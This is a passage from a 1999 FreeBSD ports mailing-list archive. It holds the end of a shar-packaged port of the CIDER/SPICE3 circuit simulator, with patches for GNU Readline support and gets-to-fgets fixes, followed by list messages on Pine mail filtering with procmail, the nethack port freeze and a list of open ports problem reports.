X*************** X*** 668,674 **** X--- 784,794 ---- X } else { X (void) setjmp(jbuf); X cp_interactive = true; X+ #ifdef HAS_GNUREADLINE X+ app_rl_readlines(); X+ #else X while (cp_evloop((char *) NULL) == 1) ; X+ #endif /* ifelse HAS_GNUREADLINE */ X } X X # else /* if BATCH */ X*************** X*** 708,714 **** X--- 828,838 ---- X /* Nutmeg "main" */ X (void) setjmp(jbuf); X cp_interactive = true; X+ #ifdef HAS_GNUREADLINE X+ app_rl_readlines(); X+ #else X while (cp_evloop((char *) NULL) == 1) ; X+ #endif /* ifelse HAS_GNUREADLINE */ X X #endif X END-of-cider/patches/patch-ad echo x - cider/patches/patch-bf sed 's/^X//' >cider/patches/patch-bf << 'END-of-cider/patches/patch-bf' X*** sim/cider/common/lib/makeops.orig Thu Feb 24 09:11:43 1994 X--- sim/cider/common/lib/makeops Mon Dec 13 11:45:34 1999 X*************** X*** 11,16 **** X--- 11,23 ---- X $(CIDER_LIB_DIR)/helpdir/cider.idx: $(OBJBIN_SPICE_DIR)/makeidx X $(OBJBIN_SPICE_DIR)/makeidx $(CIDER_LIB_DIR)/helpdir/cider.txt X X+ $(CIDER_LIB_DIR)/helpdir/spice.txt: $(DISTLIB_DIR)/helpdir/spice.txt X+ -cp $? $@ X+ X+ $(CIDER_LIB_DIR)/helpdir/spice.idx: $(DISTLIB_DIR)/helpdir/spice.txt X+ $(CIDER_LIB_DIR)/helpdir/spice.idx: $(OBJBIN_SPICE_DIR)/makeidx X+ $(OBJBIN_SPICE_DIR)/makeidx $(CIDER_LIB_DIR)/helpdir/spice.txt X+ X $(CIDER_LIB_DIR): X mkdir -p $(CIDER_LIB_DIR) X END-of-cider/patches/patch-bf echo x - cider/patches/patch-bg sed 's/^X//' >cider/patches/patch-bg << 'END-of-cider/patches/patch-bg' X*** sim/cider/common/lib/helpdir/spice.txt.orig Mon Dec 13 10:57:16 1999 X--- sim/cider/common/lib/helpdir/spice.txt Mon Dec 13 10:50:01 1999 X*************** X*** 7,12 **** X--- 7,13 ---- X TEXT: H X TEXT: H X TEXT: H X+ SUBTOPIC: CIDER:cider X SUBTOPIC: SPICE:INTRODUCTION X SUBTOPIC: SPICE:CIRCUIT DESCRIPTION X SUBTOPIC: SPICE:CIRCUIT ELEMENTS AND MODELS X*************** X*** 15,20 **** X--- 16,22 ---- X SUBTOPIC: SPICE:BIBLIOGRAPHY X SUBTOPIC: SPICE:APPENDIX A X SUBTOPIC: SPICE:APPENDIX B X+ SUBJECT: cider X SUBJECT: INTRODUCTION X TITLE: INTRODUCTION X TEXT: H END-of-cider/patches/patch-bg echo x - cider/patches/patch-ae sed 's/^X//' >cider/patches/patch-ae << 'END-of-cider/patches/patch-ae' X*** sim/spice/common/src/lib/cp/history.c.orig Sat Jan 29 18:44:09 1994 X--- sim/spice/common/src/lib/cp/history.c Sun Dec 12 14:56:43 1999 X*************** X*** 11,16 **** X--- 11,24 ---- X #include "cpdefs.h" X #include "suffix.h" X X+ #ifdef HAS_GNUREADLINE X+ X+ /* Added GNU Readline Support -- Andrew Veliath */ X+ #include X+ #include X+ X+ #endif /* HAS_GNUREADLINE */ X+ X static char *dohs(); X static void freehist(); X static wordlist *dohmod(); X*************** X*** 19,24 **** X--- 27,33 ---- X static wordlist *hpattern(); X static wordlist *hprefix(); X X+ X struct histent *cp_lastone = NULL; X int cp_maxhistlength = 1000; X char cp_hat = '^'; X*************** X*** 345,352 **** X--- 354,363 ---- X cp_lastone->hi_next = NULL; X cp_lastone->hi_event = event; X cp_lastone->hi_wlist = wl_copy(wlist); X+ #ifndef HAS_GNUREADLINE X freehist(histlength - cp_maxhistlength); X histlength++; X+ #endif X return; X } X X*************** X*** 483,492 **** X--- 494,529 ---- X wl = wl->wl_next; X rev = true; X } X+ #ifdef HAS_GNUREADLINE X+ /* Added GNU Readline Support -- Andrew Veliath */ X+ { X+ HIST_ENTRY *he; X+ int i, N; X+ X+ N = (wl == NULL) ? history_length : atoi(wl->wl_word); X+ X+ if (N < 0) N = 0; X+ if (N > history_length) N = history_length; X+ X+ if (rev) X+ for (i = history_length; i > 0 && N; --i, --N) { X+ he = history_get(i); X+ if (!he) return; X+ fprintf(cp_out, "%d\t%s\n", i, he->line); X+ } X+ else X+ for (i = history_length - N + 1; i <= history_length; ++i) { X+ he = history_get(i); X+ if (!he) return; X+ fprintf(cp_out, "%d\t%s\n", i, he->line); X+ } X+ } X+ #else X if (wl == NULL) X cp_hprint(cp_event - 1, cp_event - histlength, rev); X else X cp_hprint(cp_event - 1, cp_event - 1 - atoi(wl->wl_word), rev); X+ #endif /* ifelse HAS_GNUREADLINE */ X return; X } X END-of-cider/patches/patch-ae echo x - cider/patches/patch-af sed 's/^X//' >cider/patches/patch-af << 'END-of-cider/patches/patch-af' X*** sim/spice/common/src/lib/fte/misccoms.c.orig Wed Mar 9 04:15:44 1994 X--- sim/spice/common/src/lib/fte/misccoms.c Sun Dec 12 14:56:44 1999 X*************** X*** 11,16 **** X--- 11,24 ---- X #include "hlpdefs.h" X #include "suffix.h" X X+ #ifdef HAS_GNUREADLINE X+ #include X+ #include X+ X+ extern int gnu_history_lines; X+ extern char gnu_history_file[]; X+ #endif X+ X static void byemesg(); X X void X*************** X*** 299,304 **** X--- 307,320 ---- X byemesg(); X } else X byemesg(); X+ X+ #ifdef HAS_GNUREADLINE X+ /* Added GNU Readline Support -- Andrew Veliath */ X+ if (cp_interactive && (cp_maxhistlength > 0)) { X+ stifle_history(cp_maxhistlength); X+ write_history(gnu_history_file); X+ } X+ #endif /* HAS_GNUREADLINE */ X X exit(EXIT_NORMAL); X /* NOTREACHED */ END-of-cider/patches/patch-af echo x - cider/patches/patch-ag sed 's/^X//' >cider/patches/patch-ag << 'END-of-cider/patches/patch-ag' X*** sim/spice/common/src/lib/fte/signal.c.orig Sat Jan 29 18:48:38 1994 X--- sim/spice/common/src/lib/fte/signal.c Sun Dec 12 14:56:46 1999 X*************** X*** 32,37 **** X--- 32,39 ---- X * is true. X */ X X+ /* not using SIGINT with GNU Readline - AV */ X+ #ifndef HAS_GNUREADLINE X SIGNAL_TYPE X ft_sigintr() X { X*************** X*** 58,63 **** X--- 60,66 ---- X cp_resetcontrol(); X longjmp(jbuf, 1); X } X+ #endif /* !HAS_GNUREADLINE */ X X /* ARGSUSED */ X SIGNAL_TYPE END-of-cider/patches/patch-ag echo x - cider/patches/patch-ah sed 's/^X//' >cider/patches/patch-ah << 'END-of-cider/patches/patch-ah' X*** sim/spice/common/src/lib/fte/x10.c.orig Sat Jan 29 18:47:11 1994 X--- sim/spice/common/src/lib/fte/x10.c Sun Dec 12 14:56:48 1999 X*************** X*** 726,737 **** X--- 726,740 ---- X graph->commandline, fx0, fx1, fy0, fy1); X } X X+ /* don't use the following if using GNU Readline - AV */ X+ #ifndef HAS_GNUREADLINE X /* hack for Gordon Jacobs */ X /* add to history list if plothistory is set */ X if (cp_getvar("plothistory", VT_BOOL, (char *) &dummy)) { X wl = cp_parse(buf); X (void) cp_addhistent(cp_event++, wl); X } X+ #endif /* HAS_GNUREADLINE */ X X (void) cp_evloop(buf); X END-of-cider/patches/patch-ah echo x - cider/patches/patch-ai sed 's/^X//' >cider/patches/patch-ai << 'END-of-cider/patches/patch-ai' X*** sim/spice/common/src/lib/fte/x11.c.orig Sat Jan 29 18:48:34 1994 X--- sim/spice/common/src/lib/fte/x11.c Sun Dec 12 14:56:50 1999 X*************** X*** 773,784 **** X--- 773,787 ---- X graph->commandline, fx0, fx1, fy0, fy1); X } X X+ /* don't use the following if using GNU Readline - AV */ X+ #ifndef HAS_GNUREADLINE X /* hack for Gordon Jacobs */ X /* add to history list if plothistory is set */ X if (cp_getvar("plothistory", VT_BOOL, (char *) &dummy)) { X wl = cp_parse(buf); X (void) cp_addhistent(cp_event++, wl); X } X+ #endif /* HAS_GNUREADLINE */ X X (void) cp_evloop(buf); X END-of-cider/patches/patch-ai echo x - cider/patches/patch-ac sed 's/^X//' >cider/patches/patch-ac << 'END-of-cider/patches/patch-ac' X*** sim/spice/common/src/bin/sconvert.c.orig Sat Jan 29 19:12:56 1994 X--- sim/spice/common/src/bin/sconvert.c Sun Dec 12 14:49:36 1999 X*************** X*** 80,98 **** X X case 1: printf("Input file: "); X (void) fflush(stdout); X! (void) gets(buf); X sf = copy(buf); X printf("Input type: "); X (void) fflush(stdout); X! (void) gets(buf); X f = buf[0]; X printf("Output file: "); X (void) fflush(stdout); X! (void) gets(buf); X af = copy(buf); X printf("Output type: "); X (void) fflush(stdout); X! (void) gets(buf); X t = buf[0]; X break; X default: X--- 80,98 ---- X X case 1: printf("Input file: "); X (void) fflush(stdout); X! (void) fgets(buf,BSIZE_SP,stdin); X sf = copy(buf); X printf("Input type: "); X (void) fflush(stdout); X! (void) fgets(buf,BSIZE_SP,stdin); X f = buf[0]; X printf("Output file: "); X (void) fflush(stdout); X! (void) fgets(buf,BSIZE_SP,stdin); X af = copy(buf); X printf("Output type: "); X (void) fflush(stdout); X! (void) fgets(buf,BSIZE_SP,stdin); X t = buf[0]; X break; X default: X*** sim/spice/common/src/lib/fte/inp.c.orig Sat Jan 29 18:48:10 1994 X--- sim/spice/common/src/lib/fte/inp.c Sun Dec 12 14:49:36 1999 X*************** X*** 666,672 **** X X fprintf(cp_out, "run circuit? "); X fflush(cp_out); X! (void) gets(buf); X if (buf[0] != 'n') { X fprintf(cp_out, "running circuit\n"); X com_run(NULL); X--- 666,672 ---- X X fprintf(cp_out, "run circuit? "); X fflush(cp_out); X! (void) fgets(buf,BSIZE_SP,stdin); X if (buf[0] != 'n') { X fprintf(cp_out, "running circuit\n"); X com_run(NULL); END-of-cider/patches/patch-ac echo x - cider/patches/patch-bb sed 's/^X//' >cider/patches/patch-bb << 'END-of-cider/patches/patch-bb' X*** sim/cider/common/util/build.orig Sat Jan 29 19:32:01 1994 X--- sim/cider/common/util/build Sun Dec 12 16:45:08 1999 X*************** X*** 89,95 **** X X TMP_LEADER="${TMP_DIR}/buildl$$" X TMP_TRAILER="${TMP_DIR}/buildt$$" X! trap "rm -f ${TMP_LEADER} ${TMP_TRAILER}; exit 1" 1 2 3 4 6 7 8 9 10 12 13 14 15 X echo > "${TMP_TRAILER}" X BAD=false X DEBUG= X--- 89,95 ---- X X TMP_LEADER="${TMP_DIR}/buildl$$" X TMP_TRAILER="${TMP_DIR}/buildt$$" X! trap "rm -f ${TMP_LEADER} ${TMP_TRAILER}; exit 1" 1 2 3 4 6 7 8 10 12 13 14 15 X echo > "${TMP_TRAILER}" X BAD=false X DEBUG= X*************** X*** 166,172 **** X echo Begin build for "${SYS_NAME}" on "${BUILD_DATE}": X $EXEC cat ${FILES0} "${TOP0}/${DIR}/${SUBDIR}/makedefs" \ X "${TMP_TRAILER}" "${SKEL_DIR}/make_std.bd" \ X! | /bin/make ${VERBOSE} -f - bootstrap DIR="${DIR}" SUBDIR="${SUBDIR}" \ X VPATH="${TOP0}/${DIR}/${SUBDIR}" CWD="${CWD}" X echo Done with build at `date` X else X--- 166,172 ---- X echo Begin build for "${SYS_NAME}" on "${BUILD_DATE}": X $EXEC cat ${FILES0} "${TOP0}/${DIR}/${SUBDIR}/makedefs" \ X "${TMP_TRAILER}" "${SKEL_DIR}/make_std.bd" \ X! | /usr/bin/make ${VERBOSE} -f - bootstrap DIR="${DIR}" SUBDIR="${SUBDIR}" \ X VPATH="${TOP0}/${DIR}/${SUBDIR}" CWD="${CWD}" X echo Done with build at `date` X else END-of-cider/patches/patch-bb echo c - cider/pkg mkdir -p cider/pkg > /dev/null 2>&1 echo x - cider/pkg/COMMENT sed 's/^X//' >cider/pkg/COMMENT << 'END-of-cider/pkg/COMMENT' XA mixed-level circuit and device simulator (includes SPICE3) END-of-cider/pkg/COMMENT echo x - cider/pkg/DESCR sed 's/^X//' >cider/pkg/DESCR << 'END-of-cider/pkg/DESCR' XCIDER is a mixed-level circuit and device simulator. XCIDER attempts to provide greater simulation accuracy than a stand-alone Xcircuit or device simulator can provide. XCIDER is based on the sequential mixed-level circuit and Xdevice simulator, CODECS. In common with CODECS, CIDER embeds the circuit Xsimulator, SPICE3, which provides circuit simulation capabilities, Xanalytical models for semiconductor devices, and an interactive Xuser interface. An interface to the captive device simulator, DSIM, Xprovides accurate, one- and two-dimensional numerical models Xbased on the solution of Poisson's equation, and the electron and hole Xcurrent-continuity equations. The input format of CIDER couples XSPICE-like circuit descriptions Xto a device description format similar to the one Xused by the PISCES device simulator developed at Stanford University. XAs a result, CIDER should seem reasonably familiar to designers Xalready accustomed to both these tools. X X From the Cider help file. X X XSPICE is a general-purpose circuit simulation program for nonlinear DC, Xnonlinear transient, and linear AC analyses. Circuits may contain resistors, Xcapacitors, inductors, mutual inductors, independent voltage and current Xsources, four types of dependent sources, lossless and lossy transmission Xlines (two separate implementations), switches, uniform distributed RC Xlines, and the five most common semiconductor devices: diodes, BJTs, JFETs, XMESFETs, and MOSFETs. X X From the SPICE3 Version3f3 User's Manual. X This is availble as a postscript document from: X ftp://ic.eecs.berkeley.edu/pub/Spice3/um.3f3.ps X or you can read the online documentation on the homepage. X XWWW: http://infopad.eecs.berkeley.edu/~icdesign/SPICE/ END-of-cider/pkg/DESCR echo x - cider/pkg/PLIST sed 's/^X//' >cider/pkg/PLIST << 'END-of-cider/pkg/PLIST' Xbin/cider Xbin/spice3 Xbin/nutmeg Xbin/sconvert Xbin/help Xbin/proc2mod Xbin/multidec Xshare/cider/helpdir/cider.idx Xshare/cider/helpdir/cider.txt Xshare/cider/helpdir/spice.idx Xshare/cider/helpdir/spice.txt Xshare/cider/scripts/devaxis Xshare/cider/scripts/devload Xshare/cider/scripts/spinit Xshare/examples/cider/bicmos/bicmos.lib Xshare/examples/cider/bicmos/bicmpd.cir Xshare/examples/cider/bjt/astable.cir Xshare/examples/cider/bjt/colposc.cir Xshare/examples/cider/bjt/ecp.cir Xshare/examples/cider/bjt/invchain.cir Xshare/examples/cider/bjt/meclgate.cir Xshare/examples/cider/bjt/pebjt.lib Xshare/examples/cider/bjt/pz.cir Xshare/examples/cider/bjt/rtlinv.cir Xshare/examples/cider/bjt/vco.cir Xshare/examples/cider/diode/diode.cir Xshare/examples/cider/diode/diotran.cir Xshare/examples/cider/diode/pindiode.cir Xshare/examples/cider/jfet/jfet.cir Xshare/examples/cider/mos/bootinv.cir Xshare/examples/cider/mos/charge.cir Xshare/examples/cider/mos/cmosinv.cir Xshare/examples/cider/mos/nmosinv.cir Xshare/examples/cider/mos/pass.cir Xshare/examples/cider/mos/ringosc.cir Xshare/examples/cider/parallel/BICMOS.LIB Xshare/examples/cider/parallel/bicmpd.cir Xshare/examples/cider/parallel/bicmpu.cir Xshare/examples/cider/parallel/clkfeed.cir Xshare/examples/cider/parallel/cmosamp.cir Xshare/examples/cider/parallel/eclinv.cir Xshare/examples/cider/parallel/ecpal.cir Xshare/examples/cider/parallel/foobar Xshare/examples/cider/parallel/gmamp.cir Xshare/examples/cider/parallel/latch.cir Xshare/examples/cider/parallel/ppef.1d.cir Xshare/examples/cider/parallel/ppef.2d.cir Xshare/examples/cider/parallel/readme Xshare/examples/cider/parallel/ringosc.1u.cir Xshare/examples/cider/parallel/ringosc.2u.cir Xshare/examples/cider/readme Xshare/examples/cider/resistor/gaasres.cir Xshare/examples/cider/resistor/sires.cir Xshare/examples/cider/serial/astable.cir Xshare/examples/cider/serial/charge.cir Xshare/examples/cider/serial/colposc.cir Xshare/examples/cider/serial/dbridge.cir Xshare/examples/cider/serial/invchain.cir Xshare/examples/cider/serial/meclgate.cir Xshare/examples/cider/serial/nmosinv.cir Xshare/examples/cider/serial/pass.cir Xshare/examples/cider/serial/pullup.cir Xshare/examples/cider/serial/readme Xshare/examples/cider/serial/recovery.cir Xshare/examples/cider/serial/rtlinv.cir Xshare/examples/cider/serial/vco.cir Xshare/examples/spice3/bjtnoise.cir Xshare/examples/spice3/bsim1tst.cir Xshare/examples/spice3/bsim2tst.cir Xshare/examples/spice3/diffpair.cir Xshare/examples/spice3/diodisto.cir Xshare/examples/spice3/ltra_1.cir Xshare/examples/spice3/ltra_2.cir Xshare/examples/spice3/ltra_3.cir Xshare/examples/spice3/mixdisto.cir Xshare/examples/spice3/mos6inv.cir Xshare/examples/spice3/mosamp2.cir Xshare/examples/spice3/mosmem.cir Xshare/examples/spice3/pz2.cir Xshare/examples/spice3/pzt.cir Xshare/examples/spice3/rc.cir Xshare/examples/spice3/rca3040.cir Xshare/examples/spice3/resnoise.cir Xshare/examples/spice3/rtlinv.cir Xshare/examples/spice3/schmitt.cir Xshare/examples/spice3/simplepz.cir Xshare/spice3/helpdir/spice.txt Xshare/spice3/helpdir/spice.idx Xshare/spice3/scripts/setplot Xshare/spice3/scripts/spinit Xshare/spice3/mfbcap Xshare/spice3/news X@dirrm share/examples/cider/bicmos X@dirrm share/examples/cider/bjt X@dirrm share/examples/cider/diode X@dirrm share/examples/cider/jfet X@dirrm share/examples/cider/mos X@dirrm share/examples/cider/parallel X@dirrm share/examples/cider/resistor X@dirrm share/examples/cider/serial X@dirrm share/examples/cider X@dirrm share/examples/spice3 X@dirrm share/cider/helpdir X@dirrm share/cider/scripts X@dirrm share/cider X@dirrm share/spice3/helpdir X@dirrm share/spice3/scripts X@dirrm share/spice3 END-of-cider/pkg/PLIST echo c - cider/scripts mkdir -p cider/scripts > /dev/null 2>&1 echo x - cider/scripts/configure sed 's/^X//' >cider/scripts/configure << 'END-of-cider/scripts/configure' X#! /bin/sh X Xcp ${FILESDIR}/Makefile ${WRKSRC}/Makefile Xcp ${FILESDIR}/Makefile.spice ${WRKSRC}/sim/spice/common/Makefile Xcp ${FILESDIR}/Makefile.cider ${WRKSRC}/sim/cider/common/Makefile Xcp ${FILESDIR}/FreeBSD ${WRKSRC}/sim/spice/common/conf/FreeBSD Xcp ${FILESDIR}/FreeBSD ${WRKSRC}/sim/cider/common/conf/FreeBSD END-of-cider/scripts/configure exit >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Dec 13 10:22: 5 1999 Delivered-To: freebsd-ports@freebsd.org Received: from probity.mcc.ac.uk (probity.mcc.ac.uk [130.88.200.94]) by hub.freebsd.org (Postfix) with ESMTP id A2709151D0 for ; Mon, 13 Dec 1999 10:22:02 -0800 (PST) (envelope-from jcm@dogma.freebsd-uk.eu.org) Received: from dogma.freebsd-uk.eu.org ([130.88.200.97]) by probity.mcc.ac.uk with esmtp (Exim 1.92 #3) id 11xa6j-000JJ9-00; Mon, 13 Dec 1999 18:22:01 +0000 Received: from localhost (jcm@localhost) by dogma.freebsd-uk.eu.org (8.9.3/8.9.3) with ESMTP id SAA76678; Mon, 13 Dec 1999 18:22:00 GMT (envelope-from jcm@dogma.freebsd-uk.eu.org) Date: Mon, 13 Dec 1999 18:22:00 +0000 (GMT) From: Jonathon McKitrick To: Jim Mock Cc: freebsd-ports@FreeBSD.ORG Subject: Re: pine filtering In-Reply-To: <19991213101634.C703@luna.cdrom.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Well, i collect my email remotely, and they do not have procmail installed. On Mon, 13 Dec 1999, Jim Mock wrote: >On Mon, 13 Dec 1999 at 15:40:44 +0000, Jonathon McKitrick wrote: >> I read the FM and checked the website, and the filtering documentation >> is useless or non-existent. Has anyone had any luck with setting up >> filters on INBOXes with Pine 4.21? > >You want to use procmail. For more information, look at the Filtering >Mail FAQ'.. http://www.faqs.org/faqs/mail/filtering-faq/preamble.html > >FYI, procmail is in the ports collection.. /usr/ports/mail/procmail > >- jim > >-- >- jim mock - walnut creek cdrom/freebsd test labs - jim@cdrom.com - >- phone: 925.691.2800 x3814 - fax: 925.674.0821 - jim@FreeBSD.org - >- freebsdzine - http://www.freebsdzine.org/ - jim@freebsdzine.org - > -jm To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Dec 13 10:47:14 1999 Delivered-To: freebsd-ports@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 758) id 976F014C20; Mon, 13 Dec 1999 10:47:13 -0800 (PST) Received: from localhost (localhost [127.0.0.1]) by hub.freebsd.org (Postfix) with ESMTP id 8B3AC1CD73D; Mon, 13 Dec 1999 10:47:13 -0800 (PST) (envelope-from kris@hub.freebsd.org) Date: Mon, 13 Dec 1999 10:47:13 -0800 (PST) From: Kris Kennaway To: Jonathon McKitrick Cc: Jim Mock , freebsd-ports@FreeBSD.ORG Subject: Re: pine filtering In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 13 Dec 1999, Jonathon McKitrick wrote: > Well, i collect my email remotely, and they do not have procmail > installed. So install it yourself or as them to. For example, I have the following as my .forward "|IFS=' '&&p=/usr/local/bin/procmail&&test -f $p&&exec $p -Yf-|| exit 75 kris" but you could easily make that /home/kris/bin/procmail or whatever. If your site has set up the MTA so it only can invoke certain programs (e.g. using smrsh) then you'll need admin co-operation, but usually they're quite willing to let procmail be used. Kris To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Dec 13 10:51:35 1999 Delivered-To: freebsd-ports@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 758) id 1D51C150FE; Mon, 13 Dec 1999 10:51:34 -0800 (PST) Received: from localhost (localhost [127.0.0.1]) by hub.freebsd.org (Postfix) with ESMTP id 12EE41CD73D; Mon, 13 Dec 1999 10:51:34 -0800 (PST) (envelope-from kris@hub.freebsd.org) Date: Mon, 13 Dec 1999 10:51:34 -0800 (PST) From: Kris Kennaway To: Gregory Bond Cc: ports@freebsd.org Subject: Re: new nethack version released In-Reply-To: <199912130025.LAA20963@lightning.itga.com.au> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 13 Dec 1999, Gregory Bond wrote: > 3.3.0 released this weekend (first new version in a bazillion years). Would > love to get it into the 3.4 CDs.... Unfortunately the ports freeze is already in effect and only critical fixes go in. As cool as nethack is, it will have to wait for the next release (probably 4.0). Kris To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Dec 13 11: 0:37 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 47095152D4 for ; Mon, 13 Dec 1999 11:00:23 -0800 (PST) (envelope-from owner-bugmaster@freebsd.org) Received: (from peter@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA12004 for freebsd-ports@freebsd.org; Mon, 13 Dec 1999 11:00:22 -0800 (PST) (envelope-from owner-bugmaster@freebsd.org) Date: Mon, 13 Dec 1999 11:00:22 -0800 (PST) Message-Id: <199912131900.LAA12004@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: peter set sender to owner-bugmaster@freebsd.org using -f From: FreeBSD bugmaster To: FreeBSD ports list Subject: Current unassigned ports problem reports Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Current FreeBSD problem reports The following is a listing of current problems submitted by FreeBSD users. These represent problem reports covering all versions including experimental development code and obsolete releases. Bugs can be in one of several states: o - open A problem report has been submitted, no sanity checking performed. a - analyzed The report has been examined by a team member and evaluated. f - feedback The problem has been solved, and the originator has been given a patch or a fix has been committed. The PR remains in this state pending a response from the originator. s - suspended The problem is not being worked on. This is a prime candidate for somebody who is looking for a project to do. If the problem cannot be solved at all, it will be closed, rather than suspended. c - closed A problem report is closed when any changes have been integrated, documented, and tested. Critical problems S Submitted Tracker Resp. Description ------------------------------------------------------------------------------- o [1999/11/30] ports/15181 ports New port: comms/plp o [1999/11/30] ports/15184 ports ja-ptex-common-2.1.8 fails to execute on o [1999/12/09] ports/15393 ports [fix] japanese/expect 3 problems total. Serious problems S Submitted Tracker Resp. Description ------------------------------------------------------------------------------- o [1999/07/14] ports/12637 ports patch to help multi-byte support in windo o [1999/08/15] ports/13170 ports New port: UW-Imap with maildir and qmail o [1999/11/03] ports/14696 ports New port: wmGrabImage o [1999/11/14] ports/14888 ports ports/security/bjorb build fails o [1999/11/16] ports/14926 ports JBIG-KIT port upgraded to the version 1.1 o [1999/11/17] ports/14944 ports No stable Gimp in ports o [1999/11/18] ports/14987 ports graphics/xpm does not build a dynamic lib o [1999/11/24] ports/15085 ports fixing-upgrading the editors/xenon port o [1999/11/26] ports/15100 ports new port links-0.80 o [1999/11/27] ports/15120 ports [PATCH] mail/pine4 pgp support does not h o [1999/11/28] ports/15137 ports [PATCH] www/lynx-ssl can't find OpenSSL i o [1999/11/28] ports/15157 ports [PATCH] Environment Botch in KDM o [1999/12/01] ports/15212 ports wserv is in the wrong location, should be o [1999/12/03] ports/15241 ports Update mod_dav to 0.9.13 o [1999/12/05] ports/15287 ports Fix for linux-netscape not requiring X ao o [1999/12/07] ports/15348 ports [update] japanese/tcl80 o [1999/12/07] ports/15349 ports [update] japanese/tk80 o [1999/12/09] ports/15368 ports Update ftp/mirror o [1999/12/10] ports/15395 ports fix port: net/mrtg (BUILD/LIB_DEPEND prob o [1999/12/10] ports/15404 ports www/p5-CGI: Wrong BUILD_DEPENDS? o [1999/12/11] ports/15426 ports build of devel/t1lib hangs in configure o [1999/12/12] ports/15437 ports update graphics/gd port to support ttf an o [1999/12/12] ports/15438 ports p5-GD port update (1.18 -> 1.23) o [1999/12/12] ports/15442 ports upgrade of nethack port to 3.2.3, which h 24 problems total. Non-critical problems S Submitted Tracker Resp. Description ------------------------------------------------------------------------------- o [1998/09/19] ports/7992 ports New port: xemacs20-stepwise (XEmacs20 hac a [1998/11/25] ports/8864 ports useradd - system V compatible implementat o [1999/02/07] ports/9954 ports New port: devel/ACE o [1999/02/10] ports/10007 ports Port of the mercury compiler version 0.8 o [1999/02/16] ports/10124 ports UNIX|STAT pr submission failed to include o [1999/03/07] ports/10477 ports The fakemail in lib-src fails to link (ne o [1999/03/10] ports/10532 ports New port: lang/gpc - GNU Pascal o [1999/03/16] ports/10634 ports Update the hylafax port to do a client in o [1999/03/26] ports/10813 ports crossgo32 brokeness f [1999/03/28] ports/10844 ports New port: adagdb o [1999/04/02] ports/10916 ports New port: biology/molmol o [1999/04/08] ports/11029 ports Configure scripts for non ported applicat o [1999/04/08] ports/11034 ports New port: www/crazywwwboardle o [1999/05/11] ports/11652 ports New port: net/dictd o [1999/05/24] ports/11879 ports dclock's "-miltime" option and "*miltime" o [1999/05/31] ports/11963 ports should update the ocaml-tk module and ins o [1999/06/02] ports/12001 ports wmcdplay 1.0Beta1 05/09/1998 sometimes sk o [1999/06/13] ports/12188 ports New port: pbs-2.1.11 (misc/PBS) a batch s o [1999/06/13] ports/12195 ports New port: pgpenvelope o [1999/06/18] ports/12271 ports fix pkg_add with error message and add ne o [1999/06/23] ports/12368 ports Pilot-link installs to ${PREFIX} = ${LOCA o [1999/06/26] ports/12403 ports ssh port has undocumented X11 dependency f [1999/06/26] ports/12406 ports New port for the LAM implementation of th o [1999/07/02] ports/12490 ports package xmine exits 1 with XawAsciiSource o [1999/07/02] ports/12492 ports port misc/diction should be moved to text o [1999/07/03] ports/12503 ports New port: Willows toolkit (developers rel o [1999/07/05] ports/12518 ports New port: ifmail-os-2.14.7 o [1999/07/05] ports/12522 ports New port: cos o [1999/07/05] ports/12523 ports New port: jdbcpool o [1999/07/06] ports/12536 ports New port: lang/cu-prolog o [1999/07/07] ports/12549 ports imap-uw port doesn't use pw_expire to che o [1999/07/09] ports/12571 ports Xfig port doesn't have Ghostscript suppor o [1999/07/13] ports/12624 ports New version of mxv which also works with o [1999/07/15] ports/12656 ports New port: gnujsp o [1999/07/18] ports/12699 ports New port: gnofin-0.5.10 o [1999/07/20] ports/12722 ports New port: AT&T's DjVu library for scanned o [1999/07/21] ports/12739 ports New port: AT&T's DjVu Netscape plug-in o [1999/07/31] ports/12899 ports New port: wmnet-new o [1999/07/31] ports/12903 ports new ports/database/p5-* o [1999/08/01] ports/12915 ports Add elm 2.5 to ports o [1999/08/13] ports/13124 ports New port: LinAlg; request for local hosti o [1999/08/17] ports/13201 ports New port: xmess (X11 emulator for game co o [1999/08/31] ports/13514 ports another TCL interface to MySQL port o [1999/09/05] ports/13583 ports New port: databases/py-MySQL o [1999/09/07] ports/13614 ports xdm and wdm do not set environment variab o [1999/09/07] ports/13633 ports Better location for samba's private direc o [1999/09/09] ports/13677 ports Misc. Ports fix ups. o [1999/09/18] ports/13808 ports linux-rvplayer port improved a'la netscap o [1999/09/26] ports/13986 ports New port: sysutils/gnometoaster o [1999/09/30] ports/14052 ports fvwm95-i18n - missing dependence to fbsd- o [1999/09/30] ports/14070 ports g2c libraries and compatibility for DJGPP o [1999/10/01] ports/14077 ports Multicast not available on multicast enab o [1999/10/01] ports/14079 ports ssh2 port won't install if automake is in o [1999/10/02] ports/14088 ports port of new fvwm 2.3 beta (2.3.8) o [1999/10/07] ports/14185 ports ports/x11-wm/fvwm2 updated from 2.2.2 to o [1999/10/08] ports/14209 ports Update port: graphics/giflib to libungif- o [1999/10/11] ports/14260 ports New port: WODA - A Web Oriented Database o [1999/10/14] ports/14337 ports xdm and Eterm: tty allocation problem? o [1999/10/17] ports/14378 ports New port: graphics/mpeg o [1999/10/17] ports/14379 ports 